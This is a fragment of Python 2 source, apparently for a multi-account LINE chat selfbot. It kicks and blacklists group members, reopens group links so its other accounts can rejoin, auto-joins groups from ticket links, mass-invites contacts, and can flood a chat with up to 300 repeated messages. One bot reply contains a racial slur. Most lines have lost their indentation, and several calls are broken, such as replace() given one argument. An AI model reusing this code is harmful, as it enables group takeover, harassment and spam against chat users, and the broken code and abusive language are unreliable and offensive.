random.choice(KAC).updateGroup(G)
Ticket = random.choice(KAC).reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.01)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.param3 in Bmid:
if op.param2 not in Bots or admin:
try:
G = kc.getGroup(op.param1)
kc.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.01)
G.preventJoinByTicket = True
kc.updateGroup(G)
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(KAC).getGroup(op.param1) #Sanji Bertindak
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
random.choice(KAC).updateGroup(G)
Ticket = random.choice(KAC).reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.01)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.param3 in Cmid:
if op.param2 not in Bots or admin:
try:
G = ks.getGroup(op.param1)
ks.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.01)
G.preventJoinByTicket = True
ks.updateGroup(G)
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(KAC).getGroup(op.param1) #Sanji Bertindak
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
random.choice(KAC).updateGroup(G)
Ticket = random.choice(KAC).reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.01)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.param3 in Dmid:
if op.param2 not in Bots or admin:
try:
G = cl.getGroup(op.param1)
cl.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
ks.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.01)
G.preventJoinByTicket = True
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(KAC).getGroup(op.param1) #Sanji Bertindak
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
random.choice(KAC).updateGroup(G)
Ticket = random.choice(KAC).reissueGroupTicket(op.param1)
ks.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.01)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.param3 in admin:
if op.param2 not in Bots:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[admin])
wait["blacklist"][op.param2] = True
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[admin])
wait["blacklist"][op.param2] = True
        if op.type == 22:
            # presumably a room-invite notification -- confirm against the
            # LINE operation-type enum; auto-leave when leaveRoom mode is on
            if wait["leaveRoom"] == True:
                cl.leaveRoom(op.param1)
        if op.type == 24:
            # another room-related notification; same auto-leave policy
            if wait["leaveRoom"] == True:
                cl.leaveRoom(op.param1)
        if op.type == 25:
            # NOTE(review): duplicated guard -- the next statement repeats the
            # same `op.type == 25` check and reassigns msg identically.
            msg = op.message
        if op.type == 25:
            msg = op.message
            if msg.contentType == 13:
                # A contact card was posted while "invite" mode is armed:
                # invite that contact into the current group (admins only).
                if wait["ricoinvite"] == True:
                    if msg.from_ in admin:
                        _name = msg.contentMetadata["displayName"]
                        invite = msg.contentMetadata["mid"]
                        groups = cl.getGroup(msg.to)
                        pending = groups.invitee
                        targets = []
                        for s in groups.members:
                            # NOTE(review): `invite` is appended once per
                            # non-matching member, so targets can contain
                            # duplicates; the send loop below stops after the
                            # first target anyway.
                            if _name in s.displayName:
                                ki.sendText(msg.to,"-> " + _name + " was here")
                                break
                            elif invite in wait["blacklist"]:
                                cl.sendText(msg.to,"ขออภัย, " + _name + " บัญชีนี้อยู่ในรายการที่ถูกแบน")
                                cl.sendText(msg.to,"กรุณาแก้แบนก่อน !, \nโดยใช้คำสั่งนี้➡Unban: " + invite)
                                break
                            else:
                                targets.append(invite)
                        if targets == []:
                            pass
                        else:
                            for target in targets:
                                try:
                                    ki.findAndAddContactsByMid(target)
                                    ki.inviteIntoGroup(msg.to,[target])
                                    random.choice(KAC).sendText(msg.to,"Invited this nigga💋: \n➡" + _name)
                                    # NOTE(review): the mode is armed via
                                    # wait["ricoinvite"] but cleared on wait2 --
                                    # confirm wait2 is intended, otherwise the
                                    # mode never disarms.
                                    wait2["ricoinvite"] = False
                                    break
                                except:
                                    cl.sendText(msg.to,"Negative, Err0r Detected")
                                    wait2["ricoinvite"] = False
                                    break
            if msg.toType == 1:
                # presumably toType 1 = multi-user room -- TODO confirm;
                # auto-leave rooms when leaveRoom mode is on
                if wait["leaveRoom"] == True:
                    cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
ki.sendText(msg.to,"already")
kk.sendText(msg.to,"already")
kc.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"aded")
ki.sendText(msg.to,"aded")
kk.sendText(msg.to,"aded")
kc.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Key","help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["help1"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpgroup)
else:
cl.sendText(msg.to,Sett)
elif ("Gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif ("Red1 gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Red1 gn ","")
ki.updateGroup(X)
else:
ki.sendText(msg.to,"It can't be used besides the group.")
elif ("Red2 gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Red2 gn ","")
kk.updateGroup(X)
else:
kk.sendText(msg.to,"It can't be used besides the group.")
elif ("Red3 gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Red3 gn ","")
kc.updateGroup(X)
else:
kc.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick ","")
random.choice(KAC).kickoutFromGroup(msg.to,[midd])
elif "Red1 kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Red1 kick ","")
ki.kickoutFromGroup(msg.to,[midd])
elif "Red2 kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Red2 kick ","")
kk.kickoutFromGroup(msg.to,[midd])
elif "Red3 kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Red3 kick ","")
kc.kickoutFromGroup(msg.to,[midd])
elif "Red4 kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Red4 kick ","")
ks.kickoutFromGroup(msg.to,[midd])
elif msg.text in ["invite","ดึง"]:
if msg.from_ in admin:
wait["ricoinvite"] = True
random.choice(KAC).sendText(msg.to,"ส่งคท.ด้วย 😉")
elif "Invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "Red1 invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Red1 invite ","")
ki.findAndAddContactsByMid(midd)
ki.inviteIntoGroup(msg.to,[midd])
elif "Red2 invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Red2 invite ","")
kk.findAndAddContactsByMid(midd)
kk.inviteIntoGroup(msg.to,[midd])
elif "Red3 invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Red3 invite ","")
kc.findAndAddContactsByMid(midd)
kc.inviteIntoGroup(msg.to,[midd])
#--------------- SC Add Admin ---------
elif "Admin add @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Admin Ditambahkan")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif "Admin remove @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Admin remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Admin Dihapus")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif msg.text in ["Adminlist","adminlist"]:
if admin == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Tunggu...")
mc = "||Admin One Red Bot||\n=====================\n"
for mi_d in admin:
mc += "••>" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#--------------------------------------
#-------------- Add Friends ------------
elif "Bot Add @" in msg.text:
if msg.toType == 2:
if msg.from_ in owner:
print "[Command]Add executing"
_name = msg.text.replace("Bot Add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
ki.findAndAddContactsByMid(target)
kk.findAndAddContactsByMid(target)
kc.findAndAddContactsByMid(target)
ks.findAndAddContactsByMid(target)
except:
cl.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
#-------------=SC AllBio=---------------- Ganti Bio Semua Bot Format => Allbio: SUKA SUKA KALIAN :D
elif "Allbio:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
cl.sendText(msg.to,"Bio berubah menjadi " + string + "")
#--------------=Finish=----------------
#--------------= SC Ganti nama Owner=--------------
elif "Myname:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Myname:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Name Menjadi : " + string + "")
#-------------- copy profile----------
elif "Red say: " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Red say: ")+str(txt[1])+" "+str(jmlh + " ","")
tulisan = jmlh * (teks+"\n")
#@reno.a.w
if txt[1] == "on":
if jmlh <= 300:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Kelebihan batas:v")
elif txt[1] == "off":
if jmlh <= 300:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Kelebihan batas :v")
#-----------------=Selesai=------------------
elif msg.text in ["Bot?"]: #Ngirim Semua Kontak Bot
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
random.choice(KAC).sendMessage(msg)
elif msg.text in ["Red1"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
elif msg.text in ["愛�プレゼント","Gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
random.choice(KAC).sendMessage(msg)
elif msg.text in ["愛�プレゼント","All gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
elif msg.text in ["Cancel","cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Red cancel","Bot cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
G = k3.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
k3.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
k3.sendText(msg.to,"No one is inviting")
else:
k3.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
k3.sendText(msg.to,"Can not be used outside the group")
else:
k3.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["เปิดลิ้งค์","Open qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"QR Sudah Dibuka")
else:
random.choice(KAC).sendText(msg.to,"Sudah Terbuka Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Red1 เปิดลิ้งค์","Red1 open qr"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done Plak")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Red2 เปิดลิ้งค์","Red2 open qr"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = False
kk.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Plak")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Red3 เปิดลิ้งค์"," Red3 open qr"]:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = False
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Plak")
else:
kc.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif msg.text in ["ปิดลิ้งค์","Close qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Red1 ปิดลิ้งค์","Red1 close qr"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Plak")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Red2 ปิดลิ้งค์","Red2 close qr"]:
if msg.toType == 2:
X = kk.getGroup(msg.to)
X.preventJoinByTicket = True
kk.updateGroup(X)
if wait["lang"] == "JP":
kk.sendText(msg.to,"Done Plak")
else:
kk.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Red3 ปิดลิ้งค์","Red3 close qr"]:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = True
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Plak")
else:
kc.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif "jointicket " in msg.text.lower():
rplace=msg.text.lower().replace("jointicket ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.mid,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif "Info Group" == msg.text:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
QR = "Close"
else:
QR = "Open"
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + "[•]" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + "[•]" + gCreator + "\n\n[Group Status]\n" + "[•]Status QR =>" + QR + "\n\n[Group Picture]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "\nPending:" + sinvitee)
else:
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "My mid" == msg.text:
if msg.from_ in admin:
random.choice(KAC).sendText(msg.to, msg.from_)
elif "Mid Bot" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
elif "Redsamuri" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,Smid)
elif "Red1" == msg.text:
if msg.from_ in admin:
ki.sendText(msg.to,mid)
elif "Red2" == msg.text:
if msg.from_ in admin:
kk.sendText(msg.to,Amid)
elif "Red3" == msg.text:
if msg.from_ in admin:
kc.sendText(msg.to,Bmid)
elif msg.text in ["Wkwkwk","Wkwk","Wk","wkwkwk","wkwk","wk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hehehe","Hehe","He","hehehe","hehe","he"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Galau"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["You"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hadeuh"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Please"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Haaa"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hmmm","Hmm","Hm","hmmm","hmm","hm"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Welcome"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["TL: "]:
if msg.from_ in admin:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Bot1 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot2 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv1 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = ki.getProfile()
profile_B.displayName = string
ki.updateProfile(profile_B)
ki.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot3 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv2 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kk.getProfile()
profile_B.displayName = string
kk.updateProfile(profile_B)
kk.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Mc "]:
if msg.from_ in admin:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
#elif msg.text in ["Joinn on","joinn on"]:
#if msg.from_ in admin:
#if wait["Protectjoin"] == True:
#if wait["lang"] == "JP":
#cl.sendText(msg.to,"Kick Joined Group On")
#else:
#cl.sendText(msg.to,"Done")
#else:
#wait["Protectjoin"] = True
#if wait["lang"] == "JP":
#cl.sendText(msg.to,"Kick Joined Group On")
#else:
#cl.sendText(msg.to,"done")
#elif msg.text in ["Joinn off","joinn off"]:
#if msg.from_ in admin:
#if wait["Protectjoin"] == False:
#if wait["lang"] == "JP":
